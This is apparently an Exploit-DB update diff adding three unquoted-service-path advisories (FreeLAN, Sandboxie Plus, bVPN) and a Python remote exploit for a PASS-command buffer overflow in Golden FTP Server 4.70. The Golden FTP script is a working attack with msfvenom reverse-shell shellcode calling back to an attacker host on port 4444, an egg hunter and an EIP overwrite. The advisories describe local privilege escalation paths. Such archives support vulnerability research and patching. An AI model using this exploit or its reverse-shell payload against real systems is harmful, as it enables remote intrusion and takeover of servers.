DB: 2021-03-10

4 changes to exploits/shellcodes

FreeLAN 2.2 - 'FreeLAN Service' Unquoted Service Path
Sandboxie Plus v0.7.2 - 'SbieSvc' Unquoted Service Path
bVPN 2.5.1 - 'waselvpnserv' Unquoted Service Path

Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)

exploits/windows/local/49630.txt

@@ -0,0 +1,30 @@
+# Exploit Title: FreeLAN 2.2 - 'FreeLAN Service' Unquoted Service Path
+# Date: 2021-1-20
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: www.freelan.org
+# Software Link: https://github.com/freelan-developers/freelan/releases/download/2.2/freelan-2.2.0-x86-install.exe
+# Version: Version 2.2
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+
+# Service info:
+C:\Users\m507>sc qc "FreeLAN Service"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: FreeLAN Service
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\FreeLAN\bin\freelan.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : FreeLAN Service
+        DEPENDENCIES       : tap0901
+                           : Dhcp
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\m507>
+
+
+# Exploit:
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.

exploits/windows/local/49631.txt

@@ -0,0 +1,29 @@
+# Exploit Title: Sandboxie Plus v0.7.2 - 'SbieSvc' Unquoted Service Path
+# Date: 2021-1-20
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: sandboxie-plus.com
+# Software Link: https://github.com/sandboxie-plus/Sandboxie/releases/download/0.7.2/Sandboxie-Plus-x64-v0.7.2.exe
+# Version: Version 0.7.2
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+
+# Service info:
+C:\Users\m507>sc qc SbieSvc
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: SbieSvc
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Sandboxie-Plus\SbieSvc.exe
+        LOAD_ORDER_GROUP   : UIGroup
+        TAG                : 0
+        DISPLAY_NAME       : Sandboxie Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\m507>
+
+
+# Exploit:
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.

exploits/windows/local/49632.txt

@@ -0,0 +1,28 @@
+# Exploit Title: bVPN 2.5.1 - 'waselvpnserv' Unquoted Service Path
+# Date: 2021-1-19
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: https://carolcoral.github.io/no-free_vpn/
+# Software Link: https://github.com/carolcoral/no-free_vpn/releases/download/BVPN%4020190225/bVPN_2_5_1_setup.exe
+# Version: Version 2.5.1
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+
+# Service info:
+C:\Users\m507>sc qc "waselvpnserv"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: waselvpnserv
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:/Program Files (x86)/bVPN Service/bVPN/waselvpnserv.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : waselvpnserv
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\m507>
+
+# Exploit:
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.

exploits/windows/remote/49629.py

@@ -0,0 +1,81 @@
+# Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)
+# Author: 1F98D
+# Original Authors: Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg)
+# Tested on Windows 10 (x64)
+#
+# A buffer overflow exists in GoldenFTP during the authentication process.
+# Note that the source ip address of the user performing the authentication
+# forms part of the buffer and as such must be accounted for when calculating
+# the appropriate offset. It should also be noted that the exploit is
+# rather unstable and if exploitation fails, GoldenFTP will be left in
+# a state where it will still accept connections, but it will be unable
+# to handle or process them in anyway, so be careful.
+#
+#!/usr/local/bin/python3
+
+from socket import *
+import sys
+
+# Your address forms part of the buffer length calculation
+SOURCE = '192.168.1.1'
+TARGET = '192.168.1.2'
+s = socket(AF_INET, SOCK_STREAM)
+s.connect((TARGET, 21))
+
+# msfvenom -p windows/shell_reverse_tcp -f python -b '\x00\x0a\x0d' LHOST=192.168.1.1 LPORT=4444
+buf =  b""
+buf += b"\xba\x1e\xb6\xaa\x95\xda\xc3\xd9\x74\x24\xf4\x5d\x29"
+buf += b"\xc9\xb1\x52\x83\xc5\x04\x31\x55\x0e\x03\x4b\xb8\x48"
+buf += b"\x60\x8f\x2c\x0e\x8b\x6f\xad\x6f\x05\x8a\x9c\xaf\x71"
+buf += b"\xdf\x8f\x1f\xf1\x8d\x23\xeb\x57\x25\xb7\x99\x7f\x4a"
+buf += b"\x70\x17\xa6\x65\x81\x04\x9a\xe4\x01\x57\xcf\xc6\x38"
+buf += b"\x98\x02\x07\x7c\xc5\xef\x55\xd5\x81\x42\x49\x52\xdf"
+buf += b"\x5e\xe2\x28\xf1\xe6\x17\xf8\xf0\xc7\x86\x72\xab\xc7"
+buf += b"\x29\x56\xc7\x41\x31\xbb\xe2\x18\xca\x0f\x98\x9a\x1a"
+buf += b"\x5e\x61\x30\x63\x6e\x90\x48\xa4\x49\x4b\x3f\xdc\xa9"
+buf += b"\xf6\x38\x1b\xd3\x2c\xcc\xbf\x73\xa6\x76\x1b\x85\x6b"
+buf += b"\xe0\xe8\x89\xc0\x66\xb6\x8d\xd7\xab\xcd\xaa\x5c\x4a"
+buf += b"\x01\x3b\x26\x69\x85\x67\xfc\x10\x9c\xcd\x53\x2c\xfe"
+buf += b"\xad\x0c\x88\x75\x43\x58\xa1\xd4\x0c\xad\x88\xe6\xcc"
+buf += b"\xb9\x9b\x95\xfe\x66\x30\x31\xb3\xef\x9e\xc6\xb4\xc5"
+buf += b"\x67\x58\x4b\xe6\x97\x71\x88\xb2\xc7\xe9\x39\xbb\x83"
+buf += b"\xe9\xc6\x6e\x03\xb9\x68\xc1\xe4\x69\xc9\xb1\x8c\x63"
+buf += b"\xc6\xee\xad\x8c\x0c\x87\x44\x77\xc7\x68\x30\x76\x16"
+buf += b"\x01\x43\x78\x09\x8d\xca\x9e\x43\x3d\x9b\x09\xfc\xa4"
+buf += b"\x86\xc1\x9d\x29\x1d\xac\x9e\xa2\x92\x51\x50\x43\xde"
+buf += b"\x41\x05\xa3\x95\x3b\x80\xbc\x03\x53\x4e\x2e\xc8\xa3"
+buf += b"\x19\x53\x47\xf4\x4e\xa5\x9e\x90\x62\x9c\x08\x86\x7e"
+buf += b"\x78\x72\x02\xa5\xb9\x7d\x8b\x28\x85\x59\x9b\xf4\x06"
+buf += b"\xe6\xcf\xa8\x50\xb0\xb9\x0e\x0b\x72\x13\xd9\xe0\xdc"
+buf += b"\xf3\x9c\xca\xde\x85\xa0\x06\xa9\x69\x10\xff\xec\x96"
+buf += b"\x9d\x97\xf8\xef\xc3\x07\x06\x3a\x40\x37\x4d\x66\xe1"
+buf += b"\xd0\x08\xf3\xb3\xbc\xaa\x2e\xf7\xb8\x28\xda\x88\x3e"
+buf += b"\x30\xaf\x8d\x7b\xf6\x5c\xfc\x14\x93\x62\x53\x14\xb6"
+
+total_length = 545-len(SOURCE)
+eip = b'\x7f\x79\x4c\x00'
+hunter =  b'\x90\x90\x90\x90\x90\x90' # padding              ; nop slide to account for variable offset base on source ip
+hunter += b'\xfd'                     # std                  ; set df flag so we search high to low
+hunter += b'\xb8\x43\x42\x41\x40'     # mov eax, 0x40414243  ; egg
+hunter += b'\x89\xF7'                 # mov edi, esi         ; start searching from esi
+hunter += b'\x47'                     # inc edi
+hunter += b'\x90'                     # nop
+hunter += b'\x83\xC7\x03'             # add edi, 0x3         ; scasd decrements by 4, add 3 so we search 1 by 1
+hunter += b'\xaf'                     # scasd                ; check for egg at edi
+hunter += b'\x75\xfa'                 # short jnz -0x6       ; jump back to add edi, 0x3
+hunter += b'\x83\xC7\x03'             # add edi, 0x3
+hunter += b'\xaf'                     # scasd
+hunter += b'\x75\xfa'                 # short jnz -0x6
+hunter += b'\x83\xC7\x1f'             # add edi, 0x1f        ; account for egg hunter
+hunter += b'\xff\xe7'                 # jmp edi              ; egg found, let's go!
+hunter += b'\x90\x90\x90\x90\x90\x90' # padding              ; nop slide to account for variable offset again
+
+payload = hunter + buf + b'\x90'*(total_length-len(eip)-len(hunter)-len(buf)) + eip
+
+s.send(b'USER anonymous\r\n')
+print(s.recv(1024))
+print(s.recv(1024))
+s.send(b'PASS ' + payload + b'\r\n')
+print(s.recv(1024))
+s.send(b'QUIT\r\n')
+print(s.recv(1024))

files_exploits.csv

@@ -11277,6 +11277,9 @@ id,file,description,date,author,type,platform,port
 49623,exploits/windows/local/49623.txt,"Print Job Accounting 4.4.10 - 'OkiJaSvc' Unquoted Service Path",2021-03-08,"Brian Rodriguez",local,windows,
 49624,exploits/windows/local/49624.txt,"Configuration Tool 1.6.53 - 'OpLclSrv' Unquoted Service Path",2021-03-08,"Brian Rodriguez",local,windows,
 49626,exploits/windows/local/49626.txt,"Pingzapper 2.3.1 - 'PingzapperSvc' Unquoted Service Path",2021-03-08,"Brian Rodriguez",local,windows,
+49630,exploits/windows/local/49630.txt,"FreeLAN 2.2 - 'FreeLAN Service' Unquoted Service Path",2021-03-09,"Mohammed Alshehri",local,windows,
+49631,exploits/windows/local/49631.txt,"Sandboxie Plus v0.7.2 - 'SbieSvc' Unquoted Service Path",2021-03-09,"Mohammed Alshehri",local,windows,
+49632,exploits/windows/local/49632.txt,"bVPN 2.5.1 - 'waselvpnserv' Unquoted Service Path",2021-03-09,"Mohammed Alshehri",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18396,6 +18399,7 @@ id,file,description,date,author,type,platform,port
 49601,exploits/windows/remote/49601.py,"WiFi Mouse 1.7.8.5 - Remote Code Execution",2021-03-01,H4rk3nz0,remote,windows,
 49613,exploits/linux/remote/49613.py,"AnyDesk 5.5.2 - Remote Code Execution",2021-03-03,scryh,remote,linux,
 49621,exploits/java/remote/49621.java,"CatDV 9.2 - RMI Authentication Bypass",2021-03-05,"Christopher Ellis",remote,java,
+49629,exploits/windows/remote/49629.py,"Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)",2021-03-09,1F98D,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,